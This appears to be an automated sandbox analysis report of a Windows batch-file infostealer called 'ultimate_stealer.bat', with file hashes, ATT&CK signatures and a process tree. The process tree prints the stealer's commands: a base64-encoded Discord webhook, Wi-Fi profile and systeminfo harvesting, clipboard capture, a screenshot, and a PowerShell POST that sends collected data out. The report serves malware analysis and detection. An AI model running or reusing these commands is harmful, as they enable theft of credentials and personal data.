Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31-12-2024 10:45
Static task
static1
Behavioral task
behavioral1
Sample
ultimate_stealer.bat
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
ultimate_stealer.bat
Resource
win10v2004-20241007-en
General
-
Target
ultimate_stealer.bat
-
Size
1KB
-
MD5
8b98f150c51dd4d1131853ce39e0404a
-
SHA1
bc017b390021d8ad234bedfbb081fc0a3614c081
-
SHA256
63f1a99e5ad0aa15bc12bfe7b20d1e9a9df3752b61ec9dbb0d1bb62fc8cfe6c4
-
SHA512
a6768852c9501eaf8cd9b81dc35f863757e66d5fb532c8265f7d3ca2239c4f1fe0565ab9f37793af17fdbca642861cb986d4ac260ecb632834047b0cce8e750c
Malware Config
Signatures
-
Hawkeye family
-
Clipboard Data 1 TTPs 1 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2016 powershell.exe -
pid Process 4380 powershell.exe 3116 powershell.exe 1248 powershell.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1920 netsh.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3728 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1248 powershell.exe 1248 powershell.exe 2016 powershell.exe 2016 powershell.exe 3116 powershell.exe 3116 powershell.exe 4380 powershell.exe 4380 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1248 powershell.exe Token: SeDebugPrivilege 2016 powershell.exe Token: SeDebugPrivilege 3116 powershell.exe Token: SeDebugPrivilege 4380 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3116 powershell.exe 3116 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 4488 wrote to memory of 1248 4488 cmd.exe 83 PID 4488 wrote to memory of 1248 4488 cmd.exe 83 PID 4488 wrote to memory of 3728 4488 cmd.exe 84 PID 4488 wrote to memory of 3728 4488 cmd.exe 84 PID 4488 wrote to memory of 1920 4488 cmd.exe 87 PID 4488 wrote to memory of 1920 4488 cmd.exe 87 PID 4488 wrote to memory of 2932 4488 cmd.exe 88 PID 4488 wrote to memory of 2932 4488 cmd.exe 88 PID 2932 wrote to memory of 2636 2932 cmd.exe 89 PID 2932 wrote to memory of 2636 2932 cmd.exe 89 PID 4488 wrote to memory of 2016 4488 cmd.exe 90 PID 4488 wrote to memory of 2016 4488 cmd.exe 90 PID 4488 wrote to memory of 3116 4488 cmd.exe 91 PID 4488 wrote to memory of 3116 4488 cmd.exe 91 PID 4488 wrote to memory of 4380 4488 cmd.exe 92 PID 4488 wrote to memory of 4380 4488 cmd.exe 92
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ultimate_stealer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTMxNTMzNTExODk0MDAxNjY0MC9TenlPRnVBcm15WUlPWk9vTkR5X0MzVHpSZlNvVXgzemFzQXN0UFdsNlE3OEs1U082aHprYnF4VFlQelI1a25ia2ozVA==')) > webhook.txt"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:3728
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /C:"All User Profile" wifi_profiles.txt2⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\system32\findstr.exefindstr /C:"All User Profile" wifi_profiles.txt3⤵PID:2636
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard2⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.SendKeys]::SendWait('{PRTSC}')"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$File = 'data.txt'; $uri = ' ■h'; $body = @{content=(Get-Content -Path $File -Raw)}; Invoke-RestMethod -Uri $uri -Method Post -Body $body"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5c20ac38ae3022e305b8752804aadf486
SHA14c144d6cfafb5c37ab4810ff3c1744df81493cdb
SHA25603cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf
SHA512c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0
-
Filesize
64B
MD520eabef756751459771c47e76ba4af9d
SHA1d046d6d3912c6cd10e4b072d4a5aee81ff59c9e6
SHA256547c97c19bddd40e3e8b249a34e45a2edd916112ca7b42a37172a88c0719a3c1
SHA51275ef6b02016fc454b4e06e997146a300cda50ab99551fa009864adda91918da7fa2f9c0be44dbd3666f1fe34e05598e8e5388db85815cdbd47fdd3764baaa67d
-
Filesize
1KB
MD5224dcf4c17389871fa59fe45c7acd94a
SHA1d02998277a18745bc5a5209d80a4d5c5077772ff
SHA256c10c307786cba93488fb258b288490207e01024028a4340eab17f0c0b23dbb0e
SHA5128e30a4a06f9a06dd2556ee9125e9dc9effcc1cbb3ce6ff9fabee383db8e4fdbe7f638ea71d5a42d6722748543c8f2a4399baefdd2a2cc20e531c966b29f32e10
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD5b6435154200ed7d494f18d720bf3bde8
SHA199aa8d49ac23d8747543d85b8fe19db740f08060
SHA256c4351c266e3c8e0838a1fd08e4d70551d5dac04049d1e904f595d7de87006e2d
SHA51297d5d358173884570e733b2640861470fb1f6717c32ef6b45f1bc791ea134cc1790c543c2f764b7c5b54f1ea4a2f9f4cd67efc747b7fda4a30326e108cda7df5
-
Filesize
248B
MD562660daa7eda586bd806a7ff553ee095
SHA1d90d11b252c9637b7a3d6d04a968f9c7a1a34c50
SHA256ebf5116a4ee0ed7d86dd2523d6063f6ed3b49841432781b940e8db31c7a8694c
SHA512e2a2e77b2b66e5f9200da9ea4db3dfa65c9a8c0724b8c7d9bf1132c18690ba9a8e3e5278a597a3ebc1844c8cd6a1c42e82d4e56b6267f3a639dacf67965b18e2
-
Filesize
59B
MD5409930721dbce1ee58227d109cca4570
SHA1767f86ffec769d8415f07b4372a108cba1bf7221
SHA2566b6dd8b11f84fb78e3e8cfaa7c5fca569d79402b9fc5861b00960b25607c911e
SHA5124875187fce9545a92df636e384f92dcb403dfe80f3cad4a68e79329a1f42e12e9d04948f2a52b939638481da6d3e3b5f5096fe6dfd674ee53cca7c655ec03f17